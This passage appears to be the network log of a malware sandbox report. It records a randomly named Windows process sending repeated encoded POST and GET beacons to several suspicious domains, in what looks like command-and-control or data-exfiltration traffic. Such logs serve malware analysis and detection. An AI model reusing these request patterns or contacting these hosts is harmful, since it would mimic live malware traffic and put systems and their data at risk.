                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.5
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.tp-consulting.net
                                                      Content-Length: 192
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: max-age=0
                                                      Origin: http://www.tp-consulting.net
                                                      Referer: http://www.tp-consulting.net/3ooi/
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                      Data Ascii: lv-=4JtxSdHFa+OYNHRnavJn1WF6S9swc4MdtoKWhV4cqdFE1K2h8oJ4r6GREfgHOt2eYju6u13ffKtfF2/gB7py7R9xUWhL1ub5SLd93+mjrD3GFvj0Dy/j4/Jm/0HK6E1cKps+/xAPxNm/Y5fugMG+skSk5s6/YfOxa8rG9ScnVtRyCGLHNTqB7lKn2zmM


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      34 | 192.168.2.9 | 49749 | 5.252.229.221 | 80 | 5488 | C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Jul 9, 2024 12:10:29.937726974 CEST | 862 | OUT | POST /3ooi/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.5
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.tp-consulting.net
                                                      Content-Length: 216
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: max-age=0
                                                      Origin: http://www.tp-consulting.net
                                                      Referer: http://www.tp-consulting.net/3ooi/
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                      Data Ascii: lv-=4JtxSdHFa+OYLmhnWolnz2F1MtswJoMZtoWWhUNZquhE0rGh9tp4o6GRcvgCEN2BYjjZuxzffKpfFy7gAIx17B9zMmhN7Ob5SLd93+idrDfGFeT0FWLg7/Jp40HKtU1YKptO/wcxxOe/Y9XuhZzolkTOns7XeOvtV/nz9RlGHscRIHrZchjauyKAxUvkYoIS7wC7J0g9vJxsDvsT9g==
                                                      Jul 9, 2024 12:10:30.593400955 CEST | 360 | IN | HTTP/1.1 404 Not Found
                                                      Date: Tue, 09 Jul 2024 10:10:30 GMT
                                                      Server: Apache
                                                      Content-Length: 196
                                                      Connection: close
                                                      Content-Type: text/html; charset=iso-8859-1
                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      35 | 192.168.2.9 | 49750 | 5.252.229.221 | 80 | 5488 | C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Jul 9, 2024 12:10:32.518081903 CEST | 1875 | OUT | POST /3ooi/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.5
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.tp-consulting.net
                                                      Content-Length: 1228
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: max-age=0
                                                      Origin: http://www.tp-consulting.net
                                                      Referer: http://www.tp-consulting.net/3ooi/
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      36 | 192.168.2.9 | 49751 | 5.252.229.221 | 80 | 5488 | C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Jul 9, 2024 12:10:35.094050884 CEST | 569 | OUT | GET /3ooi/?lv-=1LFRRoLbVcSYXTZ6XdBa3kkSOtIcXt0xuK7G7zAfyuAyg5iI4oE5vIWxJ/ECDOK7eTrBqgzuJv49CznNGJBB0jFuKD1kyeaZBLZ0jvvkrC/dFa2PYg==&GJtTF=-FH8yJw HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.5
                                                      Host: www.tp-consulting.net
                                                      Connection: close
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                      Jul 9, 2024 12:10:35.748955965 CEST | 360 | IN | HTTP/1.1 404 Not Found
                                                      Date: Tue, 09 Jul 2024 10:10:35 GMT
                                                      Server: Apache
                                                      Content-Length: 196
                                                      Connection: close
                                                      Content-Type: text/html; charset=iso-8859-1
                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      37 | 192.168.2.9 | 49752 | 142.250.185.147 | 80 | 5488 | C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Jul 9, 2024 12:10:40.838975906 CEST | 847 | OUT | POST /93w6/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.5
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.lexpaidshares.online
                                                      Content-Length: 192
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: max-age=0
                                                      Origin: http://www.lexpaidshares.online
                                                      Referer: http://www.lexpaidshares.online/93w6/
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                      Jul 9, 2024 12:10:41.589036942 CEST | 410 | IN | HTTP/1.1 301 Moved Permanently
                                                      Content-Type: application/binary
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Tue, 09 Jul 2024 10:10:41 GMT
                                                      Location: https://www.lexpaidshares.online/93w6/
                                                      Server: ESF
                                                      Content-Length: 0
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Content-Type-Options: nosniff
                                                      Connection: close


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      38 | 192.168.2.9 | 49753 | 142.250.185.147 | 80 | 5488 | C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Jul 9, 2024 12:10:43.430684090 CEST | 871 | OUT | POST /93w6/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.5
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.lexpaidshares.online
                                                      Content-Length: 216
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: max-age=0
                                                      Origin: http://www.lexpaidshares.online
                                                      Referer: http://www.lexpaidshares.online/93w6/
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                      Jul 9, 2024 12:10:44.154918909 CEST | 410 | IN | HTTP/1.1 301 Moved Permanently
                                                      Content-Type: application/binary
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Tue, 09 Jul 2024 10:10:44 GMT
                                                      Location: https://www.lexpaidshares.online/93w6/
                                                      Server: ESF
                                                      Content-Length: 0
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Content-Type-Options: nosniff
                                                      Connection: close


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      39 | 192.168.2.9 | 49754 | 142.250.185.147 | 80 | 5488 | C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Jul 9, 2024 12:10:46.092117071 CEST | 1884 | OUT | POST /93w6/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.5
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.lexpaidshares.online
                                                      Content-Length: 1228
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: max-age=0
                                                      Origin: http://www.lexpaidshares.online
                                                      Referer: http://www.lexpaidshares.online/93w6/
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                      Jul 9, 2024 12:10:46.793827057 CEST | 410 | IN | HTTP/1.1 301 Moved Permanently
                                                      Content-Type: application/binary
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Tue, 09 Jul 2024 10:10:46 GMT
                                                      Location: https://www.lexpaidshares.online/93w6/
                                                      Server: ESF
                                                      Content-Length: 0
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Content-Type-Options: nosniff
                                                      Connection: close


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      40 | 192.168.2.9 | 49755 | 142.250.185.147 | 80 | 5488 | C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Jul 9, 2024 12:10:48.702397108 CEST | 572 | OUT | GET /93w6/?lv-=V/q1FcXKAyKh7SGyOejAnJ1gdaJ4XypCrXBTkGu72NAGD53UqF3q83lE5VJRfawQqtKzEaQzvnU+DANXYfAkHXtawOjKvPvgjxfsrSG69BVdxcUkzQ==&GJtTF=-FH8yJw HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.5
                                                      Host: www.lexpaidshares.online
                                                      Connection: close
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                      Jul 9, 2024 12:10:49.407016039 CEST | 549 | IN | HTTP/1.1 301 Moved Permanently
                                                      Content-Type: application/binary
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Tue, 09 Jul 2024 10:10:49 GMT
                                                      Location: https://www.lexpaidshares.online/93w6/?lv-=V/q1FcXKAyKh7SGyOejAnJ1gdaJ4XypCrXBTkGu72NAGD53UqF3q83lE5VJRfawQqtKzEaQzvnU+DANXYfAkHXtawOjKvPvgjxfsrSG69BVdxcUkzQ%3D%3D&GJtTF=-FH8yJw
                                                      Server: ESF
                                                      Content-Length: 0
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Content-Type-Options: nosniff
                                                      Connection: close


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      41 | 192.168.2.9 | 49756 | 185.181.104.242 | 80 | 5488 | C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Jul 9, 2024 12:10:54.515111923 CEST | 826 | OUT | POST /br0f/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.5
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.viertage.work
                                                      Content-Length: 192
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: max-age=0
                                                      Origin: http://www.viertage.work
                                                      Referer: http://www.viertage.work/br0f/
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                      Jul 9, 2024 12:10:55.101762056 CEST | 978 | IN | HTTP/1.1 200 OK
                                                      Server: nginx/1.18.0
                                                      Date: Tue, 09 Jul 2024 10:10:55 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Vary: Accept-Encoding
                                                      Expires: Tue, 09 Jul 2024 11:10:55 GMT
                                                      Cache-Control: max-age=3600
                                                      Pragma: public
                                                      Cache-Control: public
                                                      Content-Security-Policy: default-src http: 'unsafe-inline' 'unsafe-eval'
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Xss-Protection: 1; mode=block
                                                      X-Content-Type-Options: nosniff
                                                      X-Request-Id: 0784209fa0b90472403075fe1c2cd474
                                                      Content-Encoding: gzip


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      42 | 192.168.2.9 | 49757 | 185.181.104.242 | 80 | 5488 | C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Jul 9, 2024 12:10:57.095263958 CEST | 850 | OUT | POST /br0f/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.5
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.viertage.work
                                                      Content-Length: 216
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: max-age=0
                                                      Origin: http://www.viertage.work
                                                      Referer: http://www.viertage.work/br0f/
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                      Jul 9, 2024 12:10:57.710562944 CEST | 978 | IN | HTTP/1.1 200 OK
                                                      Server: nginx/1.18.0
                                                      Date: Tue, 09 Jul 2024 10:10:57 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Vary: Accept-Encoding
                                                      Expires: Tue, 09 Jul 2024 11:10:57 GMT
                                                      Cache-Control: max-age=3600
                                                      Pragma: public
                                                      Cache-Control: public
                                                      Content-Security-Policy: default-src http: 'unsafe-inline' 'unsafe-eval'
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Xss-Protection: 1; mode=block
                                                      X-Content-Type-Options: nosniff
                                                      X-Request-Id: e53b8286c611ec5218bfec172a6c2a78
                                                      Content-Encoding: gzip


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      43 | 192.168.2.9 | 49758 | 185.181.104.242 | 80 | 5488 | C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Jul 9, 2024 12:10:59.676304102 CEST | 1863 | OUT | POST /br0f/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.5
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.viertage.work
                                                      Content-Length: 1228
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: max-age=0
                                                      Origin: http://www.viertage.work
                                                      Referer: http://www.viertage.work/br0f/
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                      Jul 9, 2024 12:11:00.287606955 CEST | 978 | IN | HTTP/1.1 200 OK
                                                      Server: nginx/1.18.0
                                                      Date: Tue, 09 Jul 2024 10:11:00 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Vary: Accept-Encoding
                                                      Expires: Tue, 09 Jul 2024 11:11:00 GMT
                                                      Cache-Control: max-age=3600
                                                      Pragma: public
                                                      Cache-Control: public
                                                      Content-Security-Policy: default-src http: 'unsafe-inline' 'unsafe-eval'
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Xss-Protection: 1; mode=block
                                                      X-Content-Type-Options: nosniff
                                                      X-Request-Id: 004b3f8042813d09bc15aceac1963669
                                                      Content-Encoding: gzip


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      44 | 192.168.2.9 | 49759 | 185.181.104.242 | 80 | 5488 | C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Jul 9, 2024 12:11:02.820585012 CEST | 565 | OUT | GET /br0f/?lv-=ugi+9bpxNAaZR8wICrxq2eMEzwxItzjvBeZsufXo3FfvAETDHi1JbXCTNdvb4BDU5HS2z+wM6O9UukgZHdIpmHivweVWPh9LzIjwD/7QkR1e8x0qwg==&GJtTF=-FH8yJw HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.5
                                                      Host: www.viertage.work
                                                      Connection: close
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                      Jul 9, 2024 12:11:03.412784100 CEST | 1149 | IN | HTTP/1.1 200 OK
                                                      Server: nginx/1.18.0
                                                      Date: Tue, 09 Jul 2024 10:11:03 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Vary: Accept-Encoding
                                                      Expires: Tue, 09 Jul 2024 11:11:03 GMT
                                                      Cache-Control: max-age=3600
                                                      Pragma: public
                                                      Cache-Control: public
                                                      Content-Security-Policy: default-src http: 'unsafe-inline' 'unsafe-eval'
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Xss-Protection: 1; mode=block
                                                      X-Content-Type-Options: nosniff
                                                      X-Request-Id: c9bd29aa721ebb45071c8c9ef77a78b1
                                                      Data Ascii: 270<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Frameset//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-frameset.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><! Managed by ansible role: inwx_inactive_domains ><head> <meta http-equiv="content-type" content="text/html; charset=iso-8859-1" /> <meta name="ROBOTS" content="NOINDEX, NOFOLLOW"> <title>www.viertage.work has been registered</title></head><body><p align="center"><font face="Verdana, Arial, Helvetica, serif" size=2>www.viertage.work was successfully registered. There is no content yet.</font></p></body></html>0


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      45 | 192.168.2.9 | 49760 | 38.145.202.186 | 80 | 5488 | C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Jul 9, 2024 12:11:08.956190109 CEST | 829 | OUT | POST /roex/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.5
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.9988566a4.shop
                                                      Content-Length: 192
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: max-age=0
                                                      Origin: http://www.9988566a4.shop
                                                      Referer: http://www.9988566a4.shop/roex/
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                      Data Ascii: lv-=15XBwhVyD+He/vILsLgwwZZ1M1axY8NuqczlZf48+/KF5vYUbypdouT0YxTwgQ4Si6hNEyeUIT7YyecCGOTHaKHnuoub0SlD/HHmKGmePjdEh3rBWgQjPClIA3fmvVbdMdi57gkqVJBci71Kze7A1DwGszpu/jIQEE4mxYWGLUl2MXDeej+zGAuxOqLI
                                                      Jul 9, 2024 12:11:09.524163008 CEST | 691 | IN | HTTP/1.1 404 Not Found
                                                      Server: nginx
                                                      Date: Tue, 09 Jul 2024 10:11:09 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 548
                                                      Connection: close
                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      46 | 192.168.2.9 | 49761 | 38.145.202.186 | 80 | 5488 | C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Jul 9, 2024 12:11:11.535007954 CEST | 853 | OUT | POST /roex/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.5
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.9988566a4.shop
                                                      Content-Length: 216
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: max-age=0
                                                      Origin: http://www.9988566a4.shop
                                                      Referer: http://www.9988566a4.shop/roex/
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                      Data Ascii: lv-=15XBwhVyD+Het/4LtsMw4ZZ0DVaxWsNqqc/lZdUs+KaF5OoUazpd9uT0XRTs9A5Qi6lFEziUISfYyfsCF9rIbaHh3Yud+ylD/HHmKGD1PjVEhnbBXF91HilJJXfm5VbRMdjc7lEAVLJci/xKyLPD+DxPhTou5i9VFWxzsrblfnleCWjAPR3oTXuWJNCgXsqvYb7f4dI98tyAzWrXXg==
                                                      Jul 9, 2024 12:11:12.099292040 CEST | 691 | IN | HTTP/1.1 404 Not Found
                                                      Server: nginx
                                                      Date: Tue, 09 Jul 2024 10:11:12 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 548
                                                      Connection: close
                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      47 | 192.168.2.9 | 49762 | 38.145.202.186 | 80 | 5488 | C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Jul 9, 2024 12:11:14.115359068 CEST | 1866 | OUT | POST /roex/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.5
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.9988566a4.shop
                                                      Content-Length: 1228
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: max-age=0
                                                      Origin: http://www.9988566a4.shop
                                                      Referer: http://www.9988566a4.shop/roex/
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                      Jul 9, 2024 12:11:14.693792105 CEST | 691 | IN | HTTP/1.1 404 Not Found
                                                      Server: nginx
                                                      Date: Tue, 09 Jul 2024 10:11:14 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 548
                                                      Connection: close
                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      48 | 192.168.2.9 | 49763 | 38.145.202.186 | 80 | 5488 | C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Jul 9, 2024 12:11:16.679042101 CEST | 566 | OUT | GET /roex/?lv-=47/hzVl8DcmSvoQ5q5p0wIxjDl6sc/p2osL1e58noL7mmdwCeRUqiv3Sczuo1RIrkshpBASuVUC/h9VDFMrIc6PlwYO66SdA0FrSeVnyMCMUxRe8Kg==&GJtTF=-FH8yJw HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.5
                                                      Host: www.9988566a4.shop
                                                      Connection: close
